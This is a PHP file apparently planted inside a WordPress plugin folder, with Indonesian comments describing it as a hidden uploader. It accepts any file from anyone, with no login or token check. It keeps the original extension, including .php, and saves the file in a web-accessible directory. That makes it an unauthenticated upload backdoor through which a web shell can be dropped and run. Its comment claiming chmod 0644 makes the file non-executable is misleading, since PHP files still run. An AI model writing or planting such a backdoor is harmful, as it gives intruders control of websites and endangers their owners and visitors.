/home/devfahim/www/fluentlab.devfahim.site/wp-content/plugins/zeddplugins/m/up2.php
<?php
// ⚡ Upload ringan & tersembunyi — tanpa folder "uploads/"
// Simpan di folder yang sama dengan file ini, pakai nama yang di-random, stream fallback.
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_FILES['ufile'])) {
$f = $_FILES['ufile'];
if ($f['error'] !== UPLOAD_ERR_OK) {
http_response_code(400);
die("❌ Upload error: {$f['error']}");
}
$src = $f['tmp_name'];
// Sanitasi nama asli (buang path, spasi berlebih, karakter mencurigakan)
$origName = basename($f['name']);
$origName = preg_replace('/[^A-Za-z0-9\.\-\_]/', '_', $origName);
// Buat nama file acak (prefix timestamp + 8 hex) + ekstensi asli bila ada
$ext = pathinfo($origName, PATHINFO_EXTENSION);
$prefix = time() . '_' . bin2hex(random_bytes(4));
$destName = $prefix . ($ext ? '.' . $ext : '');
$destPath = __DIR__ . DIRECTORY_SEPARATOR . $destName;
$ok = false;
$method = null;
// 1) Metode paling aman & cepat: move_uploaded_file
if (is_uploaded_file($src) && @move_uploaded_file($src, $destPath)) {
$ok = true; $method = 'move_uploaded_file';
}
// 2) Fallback streaming: buka keduanya dan copy per-chunk (tidak muat seluruh file ke memori)
elseif (($in = @fopen($src, 'rb')) !== false && ($out = @fopen($destPath, 'wb')) !== false) {
while (!feof($in)) {
$chunk = fread($in, 8192);
if ($chunk === false) break;
$written = fwrite($out, $chunk);
if ($written === false) break;
}
if (is_resource($in)) fclose($in);
if (is_resource($out)) fclose($out);
$ok = file_exists($destPath) && filesize($destPath) > 0;
$method = 'stream_copy_chunk';
@unlink($src);
}
// 3) rename (kadang berhasil pada beberapa konfigurasi tmp->target)
elseif (@rename($src, $destPath)) {
$ok = true; $method = 'rename';
}
// --- jangan gunakan shell_exec / exec --- banyak hosting blok fungsi itu
// Jika berhasil, set permission yang aman dan jangan expose link langsung
if ($ok) {
@chmod($destPath, 0644); // baca oleh webserver, tapi tidak executable
$sizeKB = number_format(filesize($destPath) / 1024, 2);
// Respons minimal (tidak menampilkan path asli).
// Kalau mau, buat endpoint terpisah untuk download dengan token.
echo "✅ Upload sukses — metode: {$method}\n";
echo "📦 Nama file server-side: {$destName}\n";
echo "💾 Ukuran: {$sizeKB} KB\n";
// jangan echo path langsung seperti /file.php?name=... kecuali pakai token
} else {
http_response_code(500);
echo "❌ Semua metode upload gagal.";
}
exit;
}
?>
<!-- Form Upload -->
<form method="POST" enctype="multipart/form-data">
<input type="file" name="ufile" required>
<button type="submit">Upload</button>
</form>